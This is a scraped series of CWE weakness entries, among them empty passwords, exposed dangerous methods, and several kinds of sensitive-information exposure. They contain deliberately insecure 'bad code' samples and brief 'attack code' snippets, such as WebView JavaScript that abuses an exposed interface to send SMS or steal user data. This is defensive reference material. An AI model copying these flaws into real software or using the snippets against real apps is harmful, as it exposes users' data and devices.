For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string. This Java example shows a properties file with an empty password string. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password= ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings> ... An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1125: Excessive Attack Surface
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product has an attack surface whose quantitative
measurement exceeds a desirable maximum.
Originating from software security, an "attack surface" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses. In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-749: Exposed Dangerous Method or Function
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on. The exposure can occur in a few different ways:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter. (bad code)
Example Language: Java
public void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName); The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example. (good code)
Example Language: Java
private void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName); } Example 2 These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: (bad code)
Example Language: Java
// Android
@Override public boolean shouldOverrideUrlLoading(WebView view, String url){ if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){
if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){ }writeDataToView(view, UserData); }return false; else{ return true; }(bad code)
Example Language: Objective-C
// iOS
-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType { NSURL *URL = [exRequest URL];
if ([[URL scheme] isEqualToString:@"exampleScheme"]) { NSString *functionString = [URL resourceSpecifier];
if ([functionString hasPrefix:@"specialFunction"]) { // Make data available back in webview. UIWebView *webView = [self writeDataToView:[URL query]]; return NO; return YES; A call into native code can then be initiated by passing parameters within the URL: (attack code)
Example Language: JavaScript
window.location = examplescheme://method?parameter=value
Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. Example 3 This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website: (bad code)
Example Language: Java
public class WebViewGUI extends Activity {
WebView mainWebView;
public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); }mainWebView = new WebView(this); mainWebView.getSettings().setJavaScriptEnabled(true); mainWebView.addJavascriptInterface(new JavaScriptInterface(), "userInfoObject"); mainWebView.loadUrl("file:///android_asset/www/index.html"); setContentView(mainWebView); final class JavaScriptInterface { JavaScriptInterface () {}
public String getUserInfo() { return currentUser.Info(); }Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to. For example, if the application has permission to send text messages: (attack code)
Example Language: JavaScript
<script>
userInfoObject.getClass().forName('android.telephony.SmsManager').getMethod('getDefault',null).sendTextMessage(attackNumber, null, attackMessage, null, null); </script>This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient. Example 4 After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example: (bad code)
Example Language: Java
final class JavaScriptInterface {
JavaScriptInterface () { }
@JavascriptInterface public String getUserInfo() { return currentUser.Info(); }This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface: (attack code)
Example Language: JavaScript
<script>
var info = window.userInfoObject.getUserInfo(); </script>sendUserInfo(info); This malicious code within an iframe is able to access the interface object and steal the user's data. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.
CWE-548: Exposure of Information Through Directory Listing
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-359: Exposure of Private Personal Information to an Unauthorized Actor
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account. (bad code)
Example Language: C#
pass = GetPassword();
... dbmsLog.WriteLine(id + ":" + pass + ":" + type + ":" + tstamp); The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern. Example 2 This code uses location to determine the user's current US State location. First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: (bad code)
Example Language: XML
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: (bad code)
Example Language: Java
locationClient = new LocationClient(this, this, this);
locationClient.connect(); Location userCurrLocation; userCurrLocation = locationClient.getLastLocation(); deriveStateFromCoords(userCurrLocation); While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. Example 3 In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual's personal (private) information. Private personal information (PPI) may include a password, phone number, geographic location, personal messages, credit card number, etc. Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product. An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations. However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation. Some types of private information include:
Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry. Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student's personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private. Maintenance
This entry overlaps many other
entries that are not organized around the kind of
sensitive information that is exposed, such as CWE-212:
Improper Removal of Sensitive Information Before Storage
or Transfer. However, because privacy is treated with
such importance due to regulations and other factors, and
it may be useful for weakness-finding tools to highlight
capabilities that detect personal private information
instead of system information, it is not clear whether -
or how - this entry should be deprecated.
CWE-668: Exposure of Resource to Wrong Sphere
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files. A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system. In either case, the end result is that a resource has been exposed to the wrong party. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical
A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors.
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected. These parties include:
Information exposures can occur in different ways:
It is common practice to describe any loss of confidentiality as an "information exposure," but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read. CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store, transfer, or cleanse sensitive information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. (bad code)
Example Language: Perl
my $username=param('username');
my $password=param('password'); if (IsValidUsername($username) == 1) { if (IsValidPassword($username, $password) == 1)
}
{ print "Login Successful";
}
else { print "Login Failed - incorrect password";
}
else { print "Login Failed - unknown username";
}
In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: (result)
"Login Failed - incorrect username or password"
Example 2 This code tries to open a database connection, and prints any exceptions that occur. (bad code)
Example Language: PHP
try {
openDbConnection(); }//print exception message that includes exception message and configuration file location catch (Exception $e) { echo 'Caught exception: ', $e->getMessage(), '\n'; }echo 'Check credentials in config file at: ', $Mysql_config_location, '\n'; If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. Example 3 In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. (bad code)
Example Language: Java
public BankAccount getUserBankAccount(String username, String accountNumber) {
BankAccount userAccount = null;
String query = null; try { if (isAuthorizedUser(username)) { } catch (SQLException ex) {query = "SELECT * FROM accounts WHERE owner = " }+ username + " AND accountID = " + accountNumber; DatabaseManager dbManager = new DatabaseManager(); Connection conn = dbManager.getConnection(); Statement stmt = conn.createStatement(); ResultSet queryResult = stmt.executeQuery(query); userAccount = (BankAccount)queryResult.getObject(accountNumber); String logMessage = "Unable to retrieve account information from database,\nquery: " + query; }Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex); return userAccount; The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. Example 4 This code stores location information about the current user: (bad code)
Example Language: Java
locationClient = new LocationClient(this, this, this);
locationClient.connect(); currentUser.setLocation(locationClient.getLastLocation()); ... catch (Exception e) { AlertDialog.Builder builder = new AlertDialog.Builder(this); }builder.setMessage("Sorry, this application has experienced an error."); AlertDialog alert = builder.create(); alert.show(); Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString()); When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. Example 5 The following is an actual MySQL error statement: (result)
Example Language: SQL
Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4
The error clearly exposes the database credentials. Example 6 This code displays some information on a web page. (bad code)
Example Language: JSP
Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %>
The code displays a user's credit card and social security numbers, even though they aren't absolutely necessary. Example 7 The following program changes its behavior based on a debug flag. (bad code)
Example Language: JSP
<% if (Boolean.getBoolean("debugEnabled")) {
%>
User account number: <%= acctNo %> <% } %> The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . Example 8 This code uses location to determine the user's current US State location. First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: (bad code)
Example Language: XML
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: (bad code)
Example Language: Java
locationClient = new LocationClient(this, this, this);
locationClient.connect(); Location userCurrLocation; userCurrLocation = locationClient.getLastLocation(); deriveStateFromCoords(userCurrLocation); While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As a result of mapping analysis in the 2020 Top 25 and more recent versions, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Mapping Notes, Extended Description, and Alternate Terms.
CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does.
Network-based products, such as web applications, often run on top of an operating system or similar environment. When the product communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the product itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan. An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts. An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. A product may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code prints the path environment variable to the standard error stream: (bad code)
Example Language: C
char* path = getenv("PATH");
... sprintf(stderr, "cannot find exe on path %s\n", path); Example 2 This code prints all of the running processes belonging to the current user. (bad code)
Example Language: PHP
//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) $userName = getCurrentUser(); $command = 'ps aux | grep ' . $userName; system($command); If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. Example 3 The following code prints an exception to the standard error stream: (bad code)
Example Language: Java
try {
... } catch (Exception e) {e.printStackTrace(); }(bad code)
Example Language: Java
try {
... } catch (Exception e) {Console.Writeline(e); }Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. Example 4 The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console. (bad code)
Example Language: C#
string cs="database=northwind; server=mySQLServer...";
SqlConnection conn=new SqlConnection(cs); ... Console.Writeline(cs); Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-472: External Control of Assumed-Immutable Web Parameter
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.
